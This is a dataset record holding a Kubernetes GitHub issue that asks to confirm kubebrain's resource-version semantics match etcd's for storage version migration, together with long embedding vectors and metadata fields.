-0.012933788821101189, 0.01443919725716114, 0.015167164616286755, 0.012439054436981678, -0.0031804400496184826, 0.0005746878450736403, -0.0012094506528228521, -0.006951028015464544, -0.008318617008626461, -0.012022063136100769, 0.012622812762856483, 0.008530646562576294, -0.03895685449242592, -0.01546400599181652, 0.0001118675572797656, 0.014941000379621983, -0.0007818581652827561, 0.008502376265823841, -0.009216208010911942, -0.0014020439703017473, 0.013979800045490265, -0.011484921909868717, 0.011145674623548985, -0.011039660312235355, -0.006191256456077099, -0.008431700058281422, -0.005329004023224115, 0.007258470635861158, 0.02032654546201229, -0.01816384680569172, 0.01765497587621212, -0.014375588856637478, -0.011654545553028584, -0.038985125720500946, -0.005795468110591173, -0.006830878090113401, 0.006466894410550594, 0.015944605693221092, 0.0175842996686697, 0.004579833708703518, 0.0012827774044126272, -0.009392899461090565, -0.033359281718730927, -0.004749456886202097, 0.0071842605248093605, 0.02178248018026352, -0.007293808739632368, 0.019252263009548187, 0.026984265074133873, 0.023492850363254547, -0.006060504820197821, -0.000031804400350665674, -0.0004242795112077147, 0.023492850363254547, -0.004470285028219223, -0.01615663431584835, 0.012121009640395641, 0.0011811800068244338, 0.02664501965045929, 0.011838303878903389, 0.008240872994065285, 0.00792989693582058, -0.0006241613300517201, 0.0054244170896708965, 0.007315011695027351, 0.004668178968131542, 0.005314868409186602, -0.0031521692872047424, 0.004993290640413761, 0.011060863733291626, 0.010870036669075489, -0.007590650115162134, -0.013909123837947845, -0.005399680230766535, 0.019761133939027786, -0.004671712871640921, -0.0026167952455580235, 0.00677080312743783, 0.01540746446698904, -0.002353525487706065, 0.016623100265860558, 0.006555240135639906, 0.018941286951303482, -0.007527041248977184, -0.003392469370737672, -0.0023058189544826746, -0.00798643846064806, 0.028737042099237442, 0.0035232207737863064, 0.02325255051255226, 0.019125046208500862, 0.0034914163406938314, -0.007788544055074453, 0.01751362346112728, 0.00635027838870883, 0.013202359899878502, 0.01619904115796089, 0.02207932062447071, -0.02152804471552372, 0.005272462498396635, -0.002019579289481044, 0.013096344657242298, 0.006148850545287132, -0.006184188649058342, 0.0011608605273067951, -0.004335999954491854, -0.016651369631290436, 0.002328788861632347, -0.011322366073727608, -0.00870027020573616, -0.002749313600361347, -0.032284997403621674, 0.003072658320888877, -0.00891936756670475, 0.00341720599681139, 0.018446551635861397, -0.011364771984517574, -0.007315011695027351, -0.019874215126037598, -0.024213749915361404, -0.011781763285398483, -0.011682815849781036, 0.0009726845310069621, -0.002365893917158246, 0.008438766933977604, 0.009357561357319355, 0.0018269860884174705, 0.006177121307700872, 0.014368521049618721, -0.010947780683636665, 0.007746138144284487, -0.03652558475732803, 0.012057401239871979, 0.004035624675452709, 0.00798643846064806, -0.006760201882570982, 0.015562952496111393, 0.0038059265352785587, -0.02065165713429451, 0.009470643475651741, -0.015958741307258606, -0.022559920325875282, -0.010756954550743103, -0.01244612131267786, -0.012396648526191711, 0.015548817813396454, -0.0015796185471117496, -0.007597717456519604, -0.016608964651823044, -0.01583152264356613, 0.013209426775574684, 0.004749456886202097, 0.0029949143063277006, -0.004671712871640921, 0.019026098772883415, -0.014884458854794502, 0.005661183036863804, -0.010057257488369942, -0.0036363028921186924, 0.024878108873963356, 0.003572694258764386, 0.007205463480204344, -0.02025586925446987, -0.011916047893464565, 0.02554246596992016, 0.004714118782430887, -0.011576801538467407, 0.013866717927157879, 0.0051629142835736275, 0.003265251638367772, -0.002192736603319645, 0.006261932663619518, -0.0034101384226232767, -0.0017121367854997516, -0.02646126039326191, -0.017245052382349968, -0.017881140112876892, 0.034405291080474854, 0.0173298642039299, -0.004406676162034273, -0.0012695256154984236, 0.005516296252608299, -0.012007927522063255, -0.011633342131972313, 0.010813496075570583, -0.014290777035057545, 0.01666550524532795, -0.01485618855804205, -0.0005808720015920699, 0.012022063136100769, -0.005463289096951485, 0.026404719799757004, 0.0016635467763990164, 0.006880351807922125, -0.006721329875290394, 0.002199804177507758, 0.00783801730722189, 0.02793133072555065, 0.02759208343923092, -0.007018170785158873, -0.00032290301169268787, -0.01231890358030796, 0.016792722046375275, 0.01597287692129612, 0.0018534896662458777, -0.003314725123345852, -0.02164112776517868, -0.0017200879519805312, 0.014630023390054703, -0.00647749612107873, 0.039013396948575974, 0.036497313529253006, 0.012566271238029003, 0.0031486356165260077, 0.008311550132930279, -0.00625133141875267, 0.01754189282655716, 0.006219527218490839, -0.012191686779260635, -0.005728325806558132, 0.011810033582150936, -0.004749456886202097, 0.0013481531059369445, 0.011548531241714954, -0.002039015293121338, -0.02207932062447071, 0.02431269735097885, -0.012778300791978836, 0.017372269183397293, -0.014870323240756989, 0.022390296682715416, 0.02514667809009552, -0.012212889268994331, -0.043847665190696716, 0.00535374041646719, -0.010933646000921726, 0.025641413405537605, 0.00789455883204937, 0.008000573143362999, 0.0033500634599477053, 0.0157467108219862, -0.013682959601283073, 0.015379194170236588, 0.013640553690493107, -0.00009254196629626676, -0.025203220546245575, -0.003996752668172121, -0.015039946883916855, -0.0056929877027869225, -0.00879214983433485, 0.020156921818852425, 0.017188511788845062, -0.007329147309064865, -0.0004726487095467746, -0.013371982611715794, -0.015138894319534302, 0.0028588620480149984, 0.00385186611674726, 0.004173444118350744, 0.005014493595808744, -0.014241303317248821, -0.01160507183521986, -0.002021346241235733, 0.002261646091938019, 0.02653193660080433, -0.01839001104235649, -0.003214011201635003, 0.005876746028661728, -0.009675605222582817, -0.015435734763741493, -0.025485925376415253, 0.010233948938548565, -0.01366882398724556, 0.006883885711431503, -0.020114514976739883, 0.002332322532311082, -0.033359281718730927, -0.009202073328197002, -0.0018888278864324093, -0.0039048735052347183, 0.0024948783684521914, 0.012248227372765541, 0.0016520618228241801, -0.014008071273565292, -0.0030002149287611246, 0.0017492419574409723, 0.002380029298365116, -0.027606219053268433, -0.014884458854794502, 0.003724648617208004, -0.02452472597360611, -0.00689802085980773, -0.010241016745567322, -0.007049974985420704, -0.0009894701652228832, -0.00866493210196495, -0.019054368138313293, -0.008615458384156227, 0.007293808739632368, -0.020482033491134644, 0.008219670504331589, 0.008382226340472698, 0.0012288866564631462, -0.01889888010919094, 0.00541028194129467, 0.028539147228002548, -0.0026503666304051876, 0.009619063697755337, -0.0037140471395105124, -0.008530646562576294, -0.0010513120796531439, 0.019761133939027786, -0.010502519086003304, -0.0016944677336141467, 0.03745851665735245, -0.00009281804523197934, -0.009908837266266346, -0.004880208522081375, -0.023775555193424225, -0.0156477652490139, 0.01735813356935978, -0.003911941312253475, 0.01076402235776186, -0.012976194731891155, 0.00222454103641212, 0.013202359899878502, 0.008495308458805084, -0.011039660312235355, 0.014205965213477612, -0.013350780121982098, -0.00911726150661707, 0.026673289015889168, 0.005311334505677223, -0.02452472597360611, 0.013866717927157879, 0.004053294192999601, 0.028199899941682816, 0.01940775103867054, 0.004173444118350744, 0.01680685766041279, -0.019393615424633026, -0.021174661815166473, 0.006428022403270006, 0.004360736347734928, 0.011103269644081593, -0.0029949143063277006, 0.01279243640601635, 0.0024630739353597164, -0.017895275726914406, -0.014573482796549797, -0.007908694446086884, -0.00027122083702124655, 0.0002937489771284163, -0.0038094602059572935, -0.002456006361171603, 0.008502376265823841, 0.003622167743742466, 0.010502519086003304, 0.009569589979946613, -0.024171343073248863, 0.014156491495668888, -0.004572765901684761, 0.020566845312714577, 0.002539051230996847, 0.021923832595348358, -0.023987585678696632, 0.014255438931286335, -0.0027263436932116747, 0.0010380602907389402, -0.00425825547426939, 0.002116759540513158, -0.003282920690253377, 0.005427950993180275, -0.026560207828879356, 0.008876961655914783, -0.016835128888487816, 0.013781906105577946, -0.002837659092620015, 0.006417421158403158, 0.0037776557728648186, -0.0037599867209792137, 0.023846231400966644, -0.0035355889704078436, -0.025641413405537605, 0.010332896374166012, -0.000434439250966534, 0.02076473832130432, 0.014714835211634636, -0.00902538187801838, -0.007675461936742067, -0.008212602697312832, 0.003334161126986146, -0.018474822863936424, 0.008905231952667236, 0.0004295802500564605, -0.0009832860669121146, -0.006117046345025301, 0.0009497146820649505, 0.000921444152481854, 0.020736468955874443, 0.000217219625483267, 0.007216064725071192, 0.011930183507502079, 0.01973286271095276, -0.0059650917537510395, 0.0017421742668375373, 0.002086722059175372, -0.006074640434235334, 0.008997111581265926, -0.0015292615862563252, -0.0016343927709385753, 0.0006091425893828273, 0.011725221760571003, -0.0005715957377105951, 0.007251403294503689, -0.014898594468832016, 0.005247726105153561, 0.002864162903279066, -0.011901913210749626, 0.007102982606738806, -0.027224566787481308, 0.007866288535296917, 0.00882748793810606, -0.005279530305415392, 0.00576719781383872, -0.019139179959893227, -0.00586614478379488, -0.008544782176613808, -0.004604570101946592, 0.009555455297231674, 0.017527757212519646, 0.009555455297231674, -0.012912586331367493, 0.007244335487484932, 0.005360808223485947, 0.0022528115659952164, -0.027987871319055557, -0.006954561918973923, -0.0011078532552346587, -0.021796615794301033, -0.0076683941297233105, -0.003876602975651622, -0.00045277096796780825, -0.025853442028164864, -0.013258900493383408, -0.0036186338402330875, -0.009378763847053051, -0.02332322672009468, -0.007413958664983511, -0.03423566743731499, 0.0001634392683627084, -0.009880566969513893, -0.009230343624949455, 0.010403572581708431, -0.007413958664983511, -0.027210431173443794, 0.02032654546201229, -0.008191400207579136, 0.015704305842518806, -0.016510017216205597, 0.01871512271463871, 0.006604713387787342, -0.02101917378604412, 0.021867292001843452, -0.021033309400081635, -0.005848475731909275, 0.020736468955874443, -0.0209484975785017, 0.007675461936742067, 0.007689597085118294, 0.00647749612107873, -0.017457081004977226, 0.006307872477918863, 0.0014285476645454764, 0.0004735321563202888, 0.003023184835910797, 0.03186094015836716, 0.006134715396910906, -0.008311550132930279, 0.014453332871198654, 0.005731859710067511, 0.006357346195727587, -0.02060925029218197, 0.0002038573584286496, 0.01684926450252533, -0.014912729151546955, -0.000012603045433934312, -0.018955422565340996, 0.0075765145011246204, -0.021867292001843452, 0.012552136555314064, -0.010191543027758598, -0.001029225648380816, 0.012007927522063255, 0.008693202398717403, 0.0016025883378461003, -0.00802177656441927, -0.0027192761190235615, 0.0052653951570391655, 0.0043077291920781136, -0.01878579892218113, 0.0070358398370444775, -0.0343487523496151, -0.011576801538467407, 0.02123120427131653, 0.018700987100601196, -0.017570164054632187, -0.006558774039149284, 0.011873641982674599, 0.009562523104250431, 0.0267581008374691, 0.00299668125808239, -0.006049903575330973, -0.00889816414564848, -0.015336788259446621, -0.004495021887123585, 0.009392899461090565, 0.000054056436056271195, -0.015520546585321426, -0.026885319501161575, 0.010036054998636246, -0.05379891023039818, 0.009279817342758179, -0.010205678641796112, -0.009809890761971474, 0.002431269735097885, -0.04116196185350418, -0.02811508998274803, -0.004003820475190878, -0.01747121661901474, 0.019096774980425835, -0.029033882543444633, -0.0057495287619531155, 0.021047445014119148, -0.00021280234795995057, -0.0035974308848381042, -0.007011102978140116, -0.0006851197686046362, 0.004007354378700256, -0.01354160625487566, -0.0053219362162053585, 0.019308803603053093, 0.0015831523342058063, -0.027026671916246414, 0.008848690427839756, 0.009088990278542042, 0.008318617008626461, -0.030673576518893242, -0.016100093722343445, 0.011082066223025322, -0.014757241122424603, -0.026927724480628967, 0.01295499224215746, -0.006714262068271637, -0.0053219362162053585, 0.012085671536624432, 0.0053219362162053585, 0.009265681728720665, 0.02226307988166809, 0.00873560830950737, 0.0012942623579874635, 0.025825172662734985, 0.017881140112876892, 0.002857095329090953, -0.01717437617480755, 0.011166878044605255, 0.005742460954934359, -0.02890666574239731, 0.0005640863673761487, 0.007866288535296917, -0.0017616103868931532, -0.008467038162052631, 0.03610152751207352, 0.03864587843418121, 0.010233948938548565, -0.005449153948575258, -0.0066541871055960655, 0.004965020343661308, 0.007357417605817318, 0.004523292183876038, -0.02378969080746174, -0.0023358564358204603, -0.02383209578692913, -0.013294238597154617, 0.0017006519483402371, -0.0002703373902477324, -0.0039048735052347183, -0.003602731740102172, 0.02634817734360695, -0.007484635338187218, 0.003710513236001134, 0.027832383289933205, -0.0046328408643603325, -0.0019277000101283193, 0.005915618501603603, -0.009788687340915203, 0.0034278074745088816, -0.013167021796107292, 0.00764012336730957, 0.0033323944080621004, -0.002383562969043851, 0.014573482796549797, -0.018814068287611008, 0.007845085114240646, -0.004180511459708214, 0.0007482868386432528, -0.00039468376780860126, 0.01401513908058405, 0.02185315638780594, 0.0027581481263041496, 0.005915618501603603, -0.025386977940797806, -0.009350493550300598, 0.0060569713823497295, 0.008884028531610966, 0.013117548078298569, -0.015774982050061226, -0.03022124618291855, -0.004904945380985737, -0.014128221198916435, 0.011329433880746365, 0.01379604171961546, -0.014516941271722317, -0.004968553781509399, -0.007071177940815687, -0.012085671536624432, 0.022277215495705605, 0.0007107399869710207, 0.018121439963579178, 0.0005685036303475499, -0.016071822494268417, -0.012516798451542854, -0.007106516510248184, -0.022489244118332863, 0.005134643521159887, 0.018192116171121597, -0.012205821461975574, 0.0062796021811664104, -0.02039722166955471, 0.015492276288568974, -0.005134643521159887, 0.028100954368710518, 0.01629798859357834, 0.0013605215353891253, -0.015039946883916855, -0.005014493595808744, -0.00966853741556406, -0.007470500189810991, 0.013421456329524517, 0.004763592034578323, -0.005413815379142761, 0.02745073102414608, 0.012113942764699459, -0.01156973373144865, 0.006138249300420284, 0.00796523503959179, 0.014813782647252083, 0.004328932147473097, -0.016071822494268417, 0.01257333904504776, 0.012877248227596283, -0.014099949970841408, 0.01257333904504776, -0.001393209327943623, 0.009972445666790009, -0.007392756175249815, 0.02058098092675209, -0.010870036669075489, -0.0255848728120327, 0.025740360841155052, -0.007205463480204344, 0.0175842996686697, -0.005639980081468821, 0.002282849047333002, 0.00239946530200541, -0.007555311545729637, -0.010149137116968632, 0.024623673409223557, 0.020043838769197464, 0.01578911766409874, 0.0069792987778782845, -0.012962060049176216, 0.0028411929961293936, 0.0023888638243079185, -0.010325828567147255, -0.003897805931046605, 0.0415860190987587, 0.009251546114683151, -0.001214751391671598, 0.0047459229826927185, -0.012750030495226383, 0.007491703145205975, 0.028525011613965034, 0.011590936221182346, 0.017428811639547348, -0.0002456006477586925, 0.00798643846064806, 0.004410210065543652, -0.012057401239871979, -0.0415860190987587, 0.025273896753787994, 0.007675461936742067, -0.0011228719959035516, -0.01008552871644497, -0.0037458515726029873, -0.0009179103071801364, 0.00174040743149817, 0.0021538645960390568, -0.03703445568680763, 0.036610398441553116, -0.0074563645757734776, 0.013838447630405426, 0.009265681728720665, -0.02627750113606453, 0.0011264057829976082, -0.007148922421038151, -0.03171958774328232, 0.014955135062336922, 0.004926147870719433, 0.0032157781533896923, 0.007597717456519604, 0.01790941134095192, -0.01714610494673252, -0.003150402568280697, 0.005427950993180275, -0.006042835768312216, 0.00851651094853878, 0.02309706248342991, -0.01286311261355877, -0.0078733554109931, 0.005950956605374813, -0.016722045838832855, 0.0012306536082178354, 0.020665792748332024, -0.005572837311774492, -0.025754496455192566, -0.01198672503232956, 0.0029578092508018017, 0.002576156286522746, 0.0002639323356561363, 0.002116759540513158, 0.008219670504331589, 0.0022369094658643007, -0.020665792748332024, -0.0014020439703017473, 0.006537571083754301, -0.002358826342970133, 0.006502232979983091, -0.011272892355918884, 0.01178883109241724, 0.03367025777697563, -0.002243977040052414, 0.011908981017768383, -0.026334043592214584, 0.008509444072842598, -0.00902538187801838, 0.010792292654514313, -0.015506411902606487, 0.0012218189658597112, 0.001459468505345285, 0.014276641421020031, -0.027351783588528633, -0.0039437455125153065, 0.014955135062336922, -0.014827917329967022, 0.004919080529361963, -0.002199804177507758, -0.0030585231725126505, -0.01135063637048006, -0.0018481890438124537, -0.017386404797434807, -0.005141711328178644, 0.0035673934035003185, 0.02017105743288994, 0.00390133960172534, 0.023111196234822273, 0.018913015723228455, 0.014177694916725159, 0.011965521611273289, 0.0002813805767800659, -0.010778157971799374, -0.000565853260923177, -0.012750030495226383, 0.008551849983632565, 0.009696807712316513, -0.019690457731485367, -0.017895275726914406, 0.020043838769197464, -0.004017955623567104, -0.017683245241642, -0.007226666435599327, -0.00023323226196225733, -0.016368664801120758, -0.0014824384124949574, -0.020566845312714577, -0.0030443877913057804, 0.019167451187968254, 0.005028628744184971, 0.0035444237291812897, 0.005459755193442106, -0.01940775103867054, 0.016764452680945396, 0.0034896493889391422, 0.012566271238029003, -0.014644159004092216, -0.007392756175249815, 0.015251976437866688, 0.02795960009098053, 0.006134715396910906, 0.009937107563018799, -0.021556315943598747, -0.005618777126073837, 0.004201714415103197, 0.007028772495687008, -0.001102552516385913, 0.013103412464261055, 0.00875681173056364, -0.005827272776514292, 0.002429502783343196, 0.00528306420892477, 0.004509157035499811, 0.00538201117888093, 0.0063467444851994514, -0.01498340629041195, -0.011562665924429893, 0.004237052984535694, 0.011654545553028584, 0.0049402834847569466, 0.012834842316806316, -0.014156491495668888, -0.013817244209349155, 0.009682673029601574, -0.0018693918827921152, -0.008389294147491455, 0.014248371124267578, 0.003551491303369403, -0.014714835211634636, -0.011916047893464565, 0.013138750568032265, 0.002795253414660692, 0.00583787402138114, -0.010643872432410717, 0.01325183268636465, -0.01228356547653675, 0.01005019061267376, -0.01776805706322193, -0.0011034359922632575, -0.0032511164899915457, 0.015068218111991882, -0.002402998972684145, -0.021810749545693398, 0.01619904115796089, -0.02360593155026436, -0.005304267164319754, -0.00866493210196495, 0.02459540218114853, -0.014234235510230064, 0.022206539288163185, 0.022786084562540054, 0.006498699076473713, 0.016467610374093056, 0.007972302846610546, -0.009590793401002884, 0.02639058418571949, 0.004339533392339945, 0.009088990278542042, -0.01401513908058405, -0.001236837706528604, -0.027210431173443794, 0.013916191644966602, -0.0029578092508018017, -0.008587188087403774, 0.015237840823829174, -0.008163128979504108, 0.010792292654514313, 0.004452615976333618, -0.016750317066907883, 0.013492132537066936, 0.016651369631290436, -0.008240872994065285, -0.005010959692299366, 0.02569795399904251, 0.01228356547653675, -0.00004011440250906162, -0.014870323240756989, -0.0219662394374609, 0.0033500634599477053, -0.004583367146551609, 0.015110623091459274, 0.01940775103867054, -0.016184905543923378, -0.015817388892173767, -0.009187937714159489, 0.00773907033726573, 0.014135289005935192, 0.019181586802005768, 0.0025867577642202377, -0.005339605268090963, 0.015025812201201916, -0.01629798859357834, 0.0018340536626055837, -0.019633915275335312, -0.01717437617480755, -0.007901626639068127, 0.0063926842994987965, 0.013244765810668468, -0.004502089228481054, -0.022107591852545738, -0.0038235955871641636, 0.019944891333580017, 0.005519830156117678, 0.014955135062336922, -0.00011816217738669366, -0.018404146656394005, 0.02620682492852211, 0.003950813319534063, -0.000010691192073863931, 0.020863685756921768, -0.02544352039694786, -0.012523865327239037, 0.006678923964500427, 0.004728253930807114, -0.015251976437866688, 0.01453107688575983, -0.00879214983433485, 0.01816384680569172, 0.009060719981789589, 0.023817962035536766, 0.039352644234895706, -0.018149711191654205, -0.015110623091459274, -0.002825290895998478, -0.01273589488118887, 0.021259473636746407, -0.011562665924429893, 0.028016142547130585, -0.005138177424669266, 0.012396648526191711, 0.04528946429491043, 0.027676895260810852, 0.02459540218114853, 0.009265681728720665, 0.00882748793810606, -0.009710943326354027, -0.01699061691761017, 0.022687138989567757, 0.013711229898035526, -0.008778014220297337, -0.0007836250588297844, -0.006650653202086687, 0.00814899429678917, -0.007661326322704554, 0.004572765901684761, 0.004282992333173752, 0.020312409847974777, 0.017386404797434807, -0.004975621588528156, -0.03991805389523506, 0.014304911717772484, 0.013619350269436836, -0.019831810146570206, 0.0017006519483402371, -0.004760058596730232, -0.00683441199362278, 0.008876961655914783, -0.015096488408744335, 0.017202645540237427, 0.02360593155026436, -0.004275924991816282, 0.0052300565876066685, 0.01779632829129696, 0.012361309491097927, 0.00963319931179285, 0.0034454765263944864, 0.009152599610388279, -0.017188511788845062, -0.012241159565746784, 0.0011608605273067951, 0.004876674618571997, -0.010665074922144413, 0.0019223992712795734, -0.027620354667305946, -0.01831933483481407, -0.02369074337184429, -0.0042052483186125755, -0.018375875428318977, 0.01388792134821415, -0.03559265658259392, -0.025712089613080025, 0.0019400683231651783, -0.026857048273086548, -0.012340107001364231, 0.017994223162531853, 0.012368377298116684, -0.03217191621661186, -0.005615243222564459, 0.008431700058281422, 0.029486212879419327, 0.02127360925078392, -0.0042617893777787685, -0.005247726105153561, -0.0023181873839348555, -0.03655385598540306, -0.007696664426475763, 0.011011390015482903, -0.008247940801084042, -0.002657434204593301, 0.00615945179015398, 0.003876602975651622, -0.019803538918495178, -0.0012394881341606379, 0.004085098393261433, 0.019831810146570206, -0.0018031327053904533, 0.012135145254433155, -0.01528024673461914, 0.0016785655170679092, 0.002410066779702902, 0.01074281893670559, -0.014234235510230064, 0.00014897268556524068, -0.001561949378810823, 0.015577088110148907, -0.0034260405227541924, 0.022574055939912796, 0.011682815849781036, -0.002759915078058839, 0.020270003005862236, 0.009110193699598312, -0.008820420131087303, 0.015548817813396454, -0.0023058189544826746, 0.009336357936263084, 0.011739357374608517, 0.018686851486563683, 0.005844941828399897, 0.008982975967228413, 0.011449583806097507, -0.01167574804276228, 0.027365919202566147, -0.017315728589892387, -0.000035807555832434446, -0.01892715133726597, 0.011838303878903389, -0.005756596103310585, -0.01160507183521986, -0.01354160625487566, -0.004615171812474728, 0.01438265573233366, 0.009096058085560799, -0.00535374041646719, 0.005032162647694349, 0.004957952536642551, -0.018262792378664017, -0.0066541871055960655, -0.021754208952188492, 0.0017836967017501593, -0.0076118530705571175, 0.003830663161352277, 0.008820420131087303, 0.0026662687305361032, 0.0265036653727293, -0.00454096170142293, -0.007958167232573032, 0.01754189282655716, 0.011887777596712112, -0.02058098092675209, -0.004904945380985737, 0.01798008754849434, -0.0009417636319994926, 0.023181872442364693, -0.026122013106942177, -0.0058520096354186535, 0.0255848728120327, 0.0006007497431710362, 0.013209426775574684, 0.015153029002249241, 0.022870896384119987, -0.009173802100121975, -0.017160240560770035, 0.022418567910790443, 0.011979657225310802, -0.012057401239871979, 0.0011140374699607491, -0.036893103271722794, -0.014969270676374435, -0.0013428523670881987, -0.005795468110591173, 0.050462979823350906, -0.006212459411472082, 0.013364915736019611, 0.003763520624488592, -0.01839001104235649, -0.0299668125808239, -0.010976051911711693, 0.012022063136100769, 0.0011520260013639927, -0.0009700341615825891, -0.015167164616286755, 0.022206539288163185, -0.0045762998051941395, -0.01169695146381855, -0.0015531148528680205, 0.0053325374610722065, 0.015987010672688484, -0.02697013132274151, 0.0040921662002801895, -0.02222067303955555, -0.004682314582169056, 0.004774193745106459, -0.00022428727243095636, -0.008785082027316093, -0.00957665778696537, 0.00016542704543098807, -0.015237840823829174, 0.00689802085980773, -0.0004048435075674206, -0.022107591852545738, 0.04167082905769348, -0.013859650120139122, 0.0028800650034099817, -0.005982760805636644, 0.015435734763741493, 0.007279673591256142, 0.007442229427397251, 0.022460972890257835, -0.006459827069193125, -0.007618920411914587, 0.019421886652708054, -0.005958023946732283, -0.011619207449257374, -0.020086245611310005, -0.009187937714159489, 0.00454096170142293, -0.005915618501603603, -0.009569589979946613, 0.012128077447414398, -0.023775555193424225, -0.008262076415121555, 0.005307801067829132, -0.0173298642039299, 0.00042383780237287283, 0.01547814067453146, -0.0004788328951690346, 0.006753134075552225, -0.01652415283024311, -0.004410210065543652, -0.002744012977927923, -0.003570927307009697, -0.006958095822483301, 0.010276354849338531, 0.029288318008184433, -0.02325255051255226, 0.008311550132930279, 0.004095700103789568, 0.013880853541195393, 0.007057042792439461, -0.013605215586721897, 0.0035426567774266005, 0.0030443877913057804, 0.011612139642238617, 0.004901411477476358, 0.018729258328676224, -0.01751362346112728, 0.011060863733291626, -0.003521453822031617, -0.010862968862056732, -0.009237411431968212, -0.01597287692129612, -0.0061700535006821156, 0.008982975967228413, 0.012848976999521255, 0.005279530305415392, -0.02178248018026352, 0.007951099425554276, -0.016877533867955208, -0.00393667770549655, 0.014460400678217411, 0.008297414518892765, 0.0053325374610722065, -0.018941286951303482, -0.00798643846064806, -0.00470705097541213, -0.012340107001364231, -0.004152241162955761, -0.0009055419359356165, 0.01597287692129612, 0.028058547526597977, 0.029910270124673843, 0.005859076976776123, -0.014502806589007378, -0.01431197952479124, -0.0011979656992480159, -0.009152599610388279, 0.02189556136727333, -0.00531840231269598, -0.015944605693221092, 0.008050046861171722, -0.00044393641292117536, 0.012764165177941322, -0.004548029042780399, -0.02756381221115589, -0.014255438931286335, 0.007435161620378494, -0.00889816414564848, 0.004873140715062618, -0.0031592370942234993, 0.017061293125152588, -0.018517227843403816, 0.008078317157924175, 0.004526826087385416, -0.0005751295830123127, 0.017556028440594673, 0.013364915736019611, -0.017824599519371986, -0.005145245231688023, -0.009329290129244328, -0.011774695478379726, 0.019718727096915245, -0.005880279932171106, 0.007901626639068127, 0.004555096849799156, -0.008042979054152966, 0.01896955817937851, 0.008050046861171722, 0.009187937714159489, -0.004901411477476358, 0.031125904992222786, -0.01703302189707756, -0.0015062916791066527, -0.0025602541863918304, -0.001708602998405695, 0.006664788816124201, 0.025528330355882645, -0.0045762998051941395, -0.014001003466546535, -0.007625988218933344, -0.01385258324444294, 0.005392612423747778, -0.005859076976776123, 0.014516941271722317, 0.025104273110628128, -0.014884458854794502, 0.002676870208233595, 0.017711516469717026, 0.02306879125535488, 0.011866575106978416, 0.014036341570317745, -0.00027873023645952344, 0.022390296682715416, -0.008622526191174984, 0.01645347662270069, -0.0033076575491577387, -0.0028341254219412804, 0.012276498600840569, -0.018291063606739044, -0.005576371215283871, 0.010332896374166012, -0.017131969332695007, -0.01878579892218113, 0.024029990658164024, -0.010488384403288364, 0.01703302189707756, 0.017640840262174606, 0.00243480340577662, 0.0032511164899915457, 0.02203691564500332, 0.008580120280385017, -0.0059544905088841915, 0.008961772546172142, -0.004032091237604618, 0.000881246873177588, 0.018262792378664017, -0.01922399178147316, -0.017485352233052254, 0.012841910123825073, 0.03505551442503929, 0.021980373188853264, 0.009654401801526546, 0.010481316596269608, -0.00036641318001784384, -0.014177694916725159, -0.016764452680945396, 0.02441164292395115, 0.020114514976739883, 0.017301592975854874, 0.01553468219935894, -0.00047529907897114754, 0.009852295741438866, -0.01947842724621296, -0.007074711844325066, 0.014396791346371174 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
[kubebrain](https://github.com/kubewharf/kubebrain) implements the etcd gRPC API. We need to assert that its RV semantics match that of etcd, meaning that running SVM on either environment would work as expected. /assign nilekhc /triage accepted /sig api-machinery Links to code searches performed: [[1]](https://github.com/search?type=code&q=.RegisterWatchServer%28+.RegisterKVServer%28+language%3AGo+NOT+is%3Afork++NOT+is%3Aarchived&p=1) [[2]](https://grep.app/search?q=.RegisterWatchServer%28)
SVM RV Semantics: assert that kubebrain RV semantics match etcd
https://api.github.com/repos/kubernetes/kubernetes/issues/124641/comments
1
2024-04-30T14:15:45
2024-05-02T04:23:51Z
https://github.com/kubernetes/kubernetes/issues/124641
2,271,594,601
124,641
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : SVM RV Semantics: assert that kubebrain RV semantics match etcd Issue date: --- start body --- [kubebrain](https://github.com/kubewharf/kubebrain) implements the etcd gRPC API. We need to assert that its RV semantics match that of etcd, meaning that running SVM on either environment would work as expected. /assign nilekhc /triage accepted /sig api-machinery Links to code searches performed: [[1]](https://github.com/search?type=code&q=.RegisterWatchServer%28+.RegisterKVServer%28+language%3AGo+NOT+is%3Afork++NOT+is%3Aarchived&p=1) [[2]](https://grep.app/search?q=.RegisterWatchServer%28) --- end body ---
683
[ 0.0009325146675109863, -0.0008953094948083162, -0.025734543800354004, -0.008349225856363773, 0.026009289547801018, 0.003619397059082985, 0.009921384043991566, 0.03950237110257149, -0.00002438609408272896, 0.009486368857324123, 0.006883914116770029, 0.024070803076028824, 0.03251161053776741, 0.026039816439151764, 0.0242539681494236, 0.06300842016935349, 0.03507590666413307, 0.02387237548828125, -0.02767302840948105, -0.007967634126543999, -0.015027080662548542, -0.013210703618824482, -0.0030718131456524134, 0.024574505165219307, -0.013989151455461979, -0.0009892764501273632, -0.0065366653725504875, 0.01613369584083557, -0.05272070690989494, -0.030756289139389992, 0.03266424685716629, 0.027764610946178436, 0.015133925713598728, 0.05601765960454941, 0.02507820539176464, 0.01538577675819397, 0.02863463945686817, 0.00799816194921732, -0.02901623211801052, -0.02007172256708145, -0.021414924412965775, -0.04576047509908676, -0.0006401200662367046, -0.007906579412519932, -0.031870536506175995, 0.01607264205813408, 0.003907498903572559, 0.0018182843923568726, -0.018285874277353287, -0.014492851682007313, -0.018972737714648247, -0.05638398602604866, 0.02887885831296444, -0.037701256573200226, 0.049454282969236374, -0.0295504592359066, 0.011348536238074303, -0.001427152892574668, 0.00305082555860281, -0.03159579262137413, 0.0019146362319588661, 0.04844687879085541, -0.05040062963962555, 0.0227276012301445, 0.041486646980047226, -0.013958623632788658, -0.061665214598178864, 0.009593214839696884, -0.027169328182935715, 0.009814538061618805, 0.012859639711678028, -0.004579100292176008, 0.006292446982115507, 0.007814997807145119, 0.040051862597465515, 0.015477358363568783, 0.03455694392323494, 0.0492711178958416, -0.01128748245537281, -0.00004006712697446346, -0.010577721521258354, 0.001328893005847931, -0.010516666807234287, 0.026329826563596725, 0.04365408793091774, 0.003907498903572559, 0.03100050799548626, -0.07289927452802658, 0.016728978604078293, -0.007170107681304216, -0.04600469395518303, -0.016637397930026054, 0.029306240379810333, -0.02484925091266632, 0.040357135236263275, -0.007807365618646145, -0.009532160125672817, -0.0007293170783668756, -0.04780580475926399, 0.0004538556095212698, -0.012623053044080734, -0.021399661898612976, 0.025871915742754936, 0.019201694056391716, 0.009364260360598564, 0.0100434934720397, -0.015736840665340424, 0.034831687808036804, -0.016332123428583145, 0.1136837974190712, 0.011646178551018238, 0.0025642961263656616, -0.027337228879332542, -0.03373270481824875, -0.06777068227529526, 0.0023162614088505507, -0.0031901064794510603, 